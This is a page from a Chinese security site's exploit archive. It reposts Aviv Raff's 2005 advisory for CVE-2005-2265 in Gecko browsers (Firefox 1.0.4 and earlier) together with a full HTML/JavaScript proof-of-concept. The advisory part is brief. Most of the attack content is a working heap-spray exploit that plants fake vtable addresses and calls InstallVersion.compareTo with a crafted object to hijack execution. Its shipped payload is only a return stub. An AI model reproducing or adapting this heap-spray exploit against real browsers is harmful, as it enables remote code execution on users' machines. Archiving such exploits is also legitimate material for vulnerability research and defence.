首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Gecko InstallVersion.compareTo Code Execution
来源:http://aviv.raffon.net 作者:Aviv 发布时间:2005-12-14  

Gecko InstallVersion.compareTo Code Execution (Exploit)


Summary
Attackers can cause a DoS and execute arbitrary code on Gecko based browsers by using the Javascript function InstallVersion.compareTo with an object instead of the supposed string.

Credit:
The information has been provided by Aviv Raff.
The original article can be found at: http://aviv.raffon.net/
The vendor advisory can be found at: http://www.mozilla.org/security/announce/mfsa2005-50.html
The vendor bug report can be found at: https://bugzilla.mozilla.org/show_bug.cgi?id=295854

Details
Vulnerable Systems:
* Firefox version 1.0.4 and prior
* Mozilla Suite version 1.7.8 and prior
* Netscape version 8.0.2
* Netscape version 7.2

Immune Systems:
* Firefox 1.0.5 and above
* Mozilla Suite version 1.7.9 and above

When InstallVersion.compareTo() is passed an object rather than a string it assumed the object was another InstallVersion without verifying it. When passed a different kind of object the browser would generally crash with an access violation.

shutdown has demonstrated that different Javascript objects can be passed on some OS versions to get control over the instruction pointer. We assume this could be developed further to run arbitrary machine code if the attacker can get exploit code loaded at a predictable address.

CVE Information:
CVE-2005-2265

Exploit:
< html>
< head>
<!--
Copyright (C) 2005-2006 Aviv Raff
From: http://aviv.raffon.net/2005/12/11/ MozillaUnderestimateVulnerabilityYetAgainPlusOldVulnerabilityNewExploit.aspx
Greets: SkyLined, The Insider and shutdown
-->
<title>Mozilla (Firefox<=v1.04) InstallVersion->compareTo Remote Code Execution Exploit</title>
<script language="javascript">

function BodyOnLoad()
{
location.href="javascript:void (new InstallVersion());";
CrashAndBurn();
};

// The "Heap Spraying" is based on SkyLined InternetExploiter2 methodology
function CrashAndBurn()
{
// Spray up to this address
var heapSprayToAddress=0x12000000;

// Payload - Just return..
var payLoadCode=unescape("%u9090%u90C3");

// Size of the heap blocks
var heapBlockSize=0x400000;

// Size of the payload in bytes
var payLoadSize=payLoadCode.length * 2;

// Caluclate spray slides size
var spraySlideSize=heapBlockSize-(payLoadSize+0x38); // exclude header

// Set first spray slide ("pdata") with "pvtbl" fake address - 0x11C0002C
var spraySlide1 = unescape("%u002C%u11C0");
//var spraySlide1 = unescape("%u7070%u7070"); // For testing
spraySlide1 = getSpraySlide(spraySlide1,spraySlideSize);

var spraySlide2 = unescape("%u002C%u1200"); //0x1200002C
//var spraySlide2 = unescape("%u8080%u8080"); // For testing
spraySlide2 = getSpraySlide(spraySlide2,spraySlideSize);

var spraySlide3 = unescape("%u9090%u9090");
spraySlide3 = getSpraySlide(spraySlide3,spraySlideSize);

// Spray the heap
heapBlocks=(heapSprayToAddress-0x400000)/heapBlockSize;
//alert(spraySlide2.length); return;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i]=(i%3==0) ? spraySlide1 + payLoadCode:
(i%3==1) ? spraySlide2 + payLoadCode: spraySlide3 + payLoadCode;
}

// Set address to fake "pdata".
var eaxAddress = 0x1180002C;
// This was taken from shutdown's PoC in bugzilla
// struct vtbl { void (*code)(void); };
// struct data { struct vtbl *pvtbl; };
//
// struct data *pdata = (struct data *)(xxAddress & ~0x01);
// pdata->pvtbl->code(pdata);
//
(new InstallVersion).compareTo(new Number(eaxAddress >> 1));
}

function getSpraySlide(spraySlide, spraySlideSize) {
while (spraySlide.length*2<spraySlideSize)
{
spraySlide+=spraySlide;
}
spraySlide=spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}

// -->
< / script>
< / head>
< body onload="BodyOnLoad()">
< / body>
< / html>



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SimpleBBS Command Execution
·Watchfire AppScan QA HTTP Resp
·Mozilla Firefox InstallVersion
·Oracle XDB HTTP PASS Overflow
·Lyris ListManager /read/attach
·Mercury Mail Transport System
·HP OpenView Network Node Manag
·Flatnuke Authentication Bypass
·Oracle 9i Database XDB HTTP Au
·Mailenable Enterprise EXAMINE
·Microsoft Windows Distributed
·Microsoft IIS Malformed HTTP R
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved